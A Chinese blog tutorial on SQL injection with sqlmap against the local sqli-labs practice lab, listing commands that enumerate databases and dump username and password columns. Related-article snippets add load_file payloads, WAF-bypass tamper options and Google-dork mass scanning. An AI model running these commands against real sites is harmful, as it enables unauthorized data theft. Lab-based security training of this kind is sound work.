漏洞利用SQL注入及sqlmap基础使用

已于 2022-04-02 16:31:41 修改
阅读量2.1k 收藏 12
点赞数
分类专栏: 网络安全 文章标签: 安全 tomcat php mysql
于 2022-03-27 20:41:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57379855/article/details/123778265
版权

漏洞利用SQL注入及sqlmap基础使用

sqlmap下载

sqlmap
可以在Linux里使用,也可以在Windows里使用
使用的前提是要有python环境

sqlmap注入语句

语句 目的
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --current-db 获取当前数据库名
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --level=5 --risk=3–dbs 获取该数据库的全部数据库名
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --level=5 --risk=3–dbms=mysql -D “security” --tables 获取指定数据库下的全部数据表名
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --level=5 --risk=3–dbms=mysql -D “security” -T “users” --col 获取指定数据库的数据表的数据列名
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --level=5 --risk=3–dbms=mysql -D “security” -T “users” -C “password,username” --dump 获取指定数据库的数据表的数据列的字段
sqlmap half.txt --batch 批量扫描half.txt里需要渗透的URL

sql-las下载

我下载的是支持PHP7,需要请私信

部署数据库

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
记得添加密码,否则失败
在这里插入图片描述
在这里插入图片描述

<

最低0.47元/天 解锁文章
half~
关注
  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 2987
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
Sqlmap进阶命令使用
一醉一休的博客
02-27 1976
一.使用条件 想通过SQL注入获取对方服务器权限,需要满足以下条件:  (1)当前SQL注入的用户必须为DBA权限(–is-dba为true)  (2)需要知道网站的绝对路径  (3)GPC为off,php主动转义功能为关闭  (4)my.ini文件中的这项配置secure_file_priv="" 为空 二.文件操作 如何知道绝对路径 1.探针文件,phpinfo文件,在phpinfo文件中搜索DOCUMENT_ROOT 2.报错页面,ThinkPHP,debug=true 报错 , IIS报错 3.
sql注入漏洞sqlmap使用
hmysn的博客
07-07 2056
目录什么是sql漏洞sql语言:数据库和网页用户请求的原理:sql注入原理:sql注入检测:sql注入检测工具:实例演示:漏洞防御 这边采用了皮卡丘的sql漏洞的概述: 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
sqlmap对php注入,sqlmap使用(检测SQL注入漏洞)以及防护SQL注入
weixin_34723270的博客
03-17 420
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。它由Python语言开发而成,因此运行需要安装python2.7环境。常用注入:python sqlmap.py -u 地址 可以查看是否能对当前URL进行注入python sqlmap.py -u 地址 -v 1 --dbs // 列...
sqlmap使用详解(二:实用小技巧)
→_→
10-10 1480
mysql基本hack函数: mid SELECTMID(ColumnName,Start[,Length])FROMTableName left(str,len) 返回字符串str的最左面len个字符 ascii(str) =ord 返回字符串str的最左面字符的ASCII代码值。如果str是空字符串,返回0。如果str是NULL,返回NULL substr(str,pos,len) 从str中多少个字符开始,截取多少位 CAST SELECT CAST(’12’...
sqlmap命令详解
Pitbull2014的博客
12-20 1119
cookie注入sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap sql 注入测试工具
最新发布
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
网络安全 sql注入工具sqlmap使用
01-13
网络安全sql注入工具sqlmap使用 Sqlmap是当前最流行的sql注入工具之一,广泛应用于网络安全领域,特别是在渗透测试和漏洞扫描领域。Sqlmap可以自动检测和利用SQL注入漏洞,获取数据库敏感信息,包括数据库结构、...
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
SQL注入SQLmap工具
06-12
在本地进行对于SQL注入漏洞进行原理剖析与分析讲解,让学生可以使用SQLmap等工具
sql注入攻击之sqlmap
06-10
SQLMap是一款自动化工具,专为检测和利用SQL注入漏洞而设计,尤其适合信息安全初学者。 SQLMap的工作原理基于探测、枚举、数据提取和权限提升等步骤。首先,它会尝试探测目标站点是否存在SQL注入漏洞,这通常通过...
sqlmap 读写文件
weixin_48734687的博客
10-13 4229
sqlmap 读写文件 读文件 靶场:sqli-lab less-1 读取文件前提 权限足够 mysql 配置文件my.ini中的变量secure_file_priv值不为空(secure_file_priv=) 服务器能够回显数据 所用到的sql语句 select load_file(路径文件名) shell -1’ union select 1,load_file(‘D:/web_address.txt’),3–+ 写文件 靶场:sqli-lab less-7 写入文件前提 权限足够 开
Sqlmap基础命令介绍及常用命令
_Ralph的博客
01-16 1万+
POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehas
常见的Sqlmap语句
安全小站
09-25 2825
Access:  –爆表 sqlmap.py -u http://127.0.0.1/news.asp?id=7″  –table –爆字段 sqlmap.py -u “http://127.0.0.1/news.asp?id=7″ –columns -T admin –爆账号密码 ./sqlmap.py -u “http://127.0.0.1/news.asp?id=7″ –
SQL注入:为什么拿不到os-shell?
无名J0kзr的博客
10-08 1750
文章目录权限问题--file-read--file-write和--file-dest--os-shell 权限问题 首先确保注入点的数据库连接用户有FILE权限 使用 --privileges查看 但是 就算有此权限也还有很多问题 SELINUX 因为我的服务器使用的并不是Apache的默认发布目录 所以我把SELINUX禁掉了 按理来说 SELINUX也会对这些操作有影响 没试 先留坑 –fi...
sqlmap自动扫描注入点_简记——利用sqlmap检测网站sql注入漏洞获取数据
weixin_39834488的博客
11-26 1605
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供了将恶意代码注入其中的选项。[1]它是一种渗透测试工具,可在终端中提供其用户界面,从而自动检测和利用SQL注入漏洞的过程。[2]该软件在命令行运行,可以下载用于不同的操作系统:Linux发行版,Windows和Mac OS操作系统。[3]除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据以及查看表中的数据,例如用户,密码,备份...
SQLmap————6、搜索型注入
Fly_鹏程万里
05-04 1930
参数—————— -gsqlmap可以测试注入Google的搜索结果中的Get参数(只获取前100个结果)例如:sqlmap -g "inurl:php?eid="如果可以注入,那么之后和常规一样,通过“--dbs\--tables\--columns\--dump”直接获取数据库名、表名、列名、字段名等等。这里就不再一一罗列了!...
Sqlmap简单使用详解
Zlirving_的博客
05-29 980
Sqlmap概述 Sqlap是一个开源的、自动化的SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过tamper脚本,功能非常强大 (当然在检测漏洞的时候最好就是手工配合工具) 工作原理 它的工作原理和手工注入的原理是一样的:检测动态页面中get/post参数、cookie、 http头,并爆出数据。 不需要我们再手动写payload,因为它有非常强大的引擎,各种各样的参数、各种各样的位置,它都可以去完成SQL注入漏洞的检测、利用、以及数据的提取。 Win安装 这个sq
Sql注入系列详解(一)---基于时间差的盲注
热门推荐
AI.PLAY
05-07 1万+
Sql 基于时间的盲注   基于的原理是,当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0.但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0. 例如: 于是sleep(N)这个语句在这种情况下起到了非常大的作用。  Select sleep(N)可以让此语句运行n秒钟。 但是如果查询语句的条件不存在,执行的时间便是0,利用该函数
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全漏洞,攻击者通过在输入数据中插入恶意的SQL代码,使应用程序接受并执行其代码,从而获得不应该被揭示的敏感信息。SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值